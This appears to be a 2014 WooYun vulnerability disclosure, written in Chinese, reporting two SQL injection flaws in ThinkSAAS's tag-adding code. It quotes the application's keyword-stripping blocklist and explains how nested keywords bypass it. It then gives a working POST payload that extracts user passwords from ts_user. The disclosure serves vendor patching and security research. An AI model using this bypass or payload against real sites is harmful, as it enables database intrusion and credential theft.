当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053384

漏洞标题:ThinkSAAS最新版绕过过滤继续注入2处

相关厂商:thinksaas.cn

漏洞作者: xfkxfk

提交时间:2014-03-11 23:13

修复时间:2014-06-09 23:13

公开时间:2014-06-09 23:13

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-11: 细节已通知厂商并且等待厂商处理中
2014-03-12: 厂商已经确认,细节仅向厂商公开
2014-03-15: 细节向第三方安全合作伙伴开放
2014-05-06: 细节向核心白帽子及相关领域专家公开
2014-05-16: 细节向普通白帽子公开
2014-05-26: 细节向实习白帽子公开
2014-06-09: 细节向公众公开

简要描述:

ThinkSAAS最新版绕过过滤继续注入2处
无视gpc,无需登录

详细说明:

之前这个漏洞有 ′ 雨。分析过: WooYun: Thinksaas某处绕过过滤的注射漏洞
现在官方有最新版,做了修改,加了过滤,但是过滤不严格,可以绕过继续注入。
第一处:
现在最新的代码/app/tag/action/add_ajax.php

case "do":

$objname = t($_POST['objname']);
$idname = tsFilter(t($_POST['idname']));
$objid = t($_POST['objid']);
$tags = t($_POST['tags']);

$new['tag']->addTag($objname,$idname,$objid,$tags);

echo "<script language=JavaScript>parent.window.location.reload();</script>";

break;


在原来的$idname = t($_POST['idname']);基础上加了过滤函数tsFilter
这里进行了双层过滤,t过滤了很多字符,而tsFilter过滤注入关键字。

function t($text) {
$text = preg_replace ( '/\[.*?\]/is', '', $text );
$text = cleanJs ( $text );
// 彻底过滤空格BY QINIAO
$text = preg_replace ( '/\s(?=\s)/', '', $text );
$text = preg_replace ( '/[\n\r\t]/', ' ', $text );
$text = str_replace ( ' ', ' ', $text );
// $text = str_replace ( ' ', '', $text );
$text = str_replace ( '&nbsp;', '', $text );
$text = str_replace ( '&', '', $text );
$text = str_replace ( '=', '', $text );
$text = str_replace ( '-', '', $text );
$text = str_replace ( '#', '', $text );
$text = str_replace ( '%', '', $text );
$text = str_replace ( '!', '', $text );
$text = str_replace ( '@', '', $text );
$text = str_replace ( '^', '', $text );
$text = str_replace ( '*', '', $text );
$text = str_replace ( 'amp;', '', $text );

$text = str_replace ( 'position', '', $text );

$text = strip_tags ( $text );
$text = htmlspecialchars ( $text );
$text = str_replace ( "'", "", $text );
return $text;
}


过滤字符的。

function tsFilter($value){
$value = trim($value);
//定义不允许提交的SQl命令和关键字
$words = array();
$words[] = "add ";
$words[] = "and ";
$words[] = "count ";
$words[] = "order ";
$words[] = "table ";
$words[] = "by ";
$words[] = "create ";
$words[] = "delete ";
$words[] = "drop ";
$words[] = "from ";
$words[] = "grant ";
$words[] = "insert ";
$words[] = "select ";
$words[] = "truncate ";
$words[] = "update ";
$words[] = "use ";
$words[] = "--";
$words[] = "#";
$words[] = "group_concat";
$words[] = "column_name";
$words[] = "information_schema.columns";
$words[] = "table_schema";
$words[] = "union ";
$words[] = "where ";
$words[] = "alert";
$value = strtolower($value);//转换为小写
foreach($words as $word){
if(strstr($value,$word)){
$value = str_replace($word,'',$value);
}
}

return $value;
}


过滤注入关键字。
通过t函数我们可以不用这里面的这些字符就是了。
而tsFilter我们可以将“select”改为“selselect ect”,就可以绕过过滤。
下面来看看addTag函数进行添加标签处理的:

function addTag($objname,$idname,$objid,$tags){
......
$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
$idname=>$objid,
'tagid'=>$tagid,
));


在这里$idname 做了key,带入findCount函数。

public function findCount($table, $conditions = null) {
$where = "";
if (is_array ( $conditions )) {
$join = array ();
foreach ( $conditions as $key => $condition ) {
$condition = $this->escape ( $condition );
$join [] = "{$key} = {$condition}";
}
$where = "WHERE " . join ( " AND ", $join );
} else {
if (null != $conditions)
$where = "WHERE " . $conditions;
}
$sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}";
$result = $this->db->once_fetch_assoc ( $sql );

return $result ['ts_counter'];
}


这里只是对value做了过滤,但是key没有过滤。
通过上面的绕过过滤,以及下面的分析,可以直接注入了。
第二处注入在add.php文件

case "do":

$objname = tsFilter($_POST['objname']);
$idname = tsFilter($_POST['idname']);
$objid = intval($_POST['objid']);
$tags = t($_POST['tags']);

$new['tag']->addTag($objname,$idname,$objid,$tags);

tsNotice('标签添加成功!');

break;


同样是进行addtag,但是这里没有t函数,只有一个tsFilter函数进行过滤,注入起来更容易了。
其他跟上面第一处注入是过程一样的。

漏洞证明:

发送请求:
链接:http://localhost/thinksaas/index.php?app=tag&ac=add_ajax&ts=do
POST:objid=111111&objname=article&idname=111 uniunion on seleselect ct pwd frfrom om ts_user limit 1,1;a&tags=idname

11.png


22.png

修复方案:

严格过滤

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-12 13:57

厂商回复:

感谢提交,正在修复...

最新状态:

暂无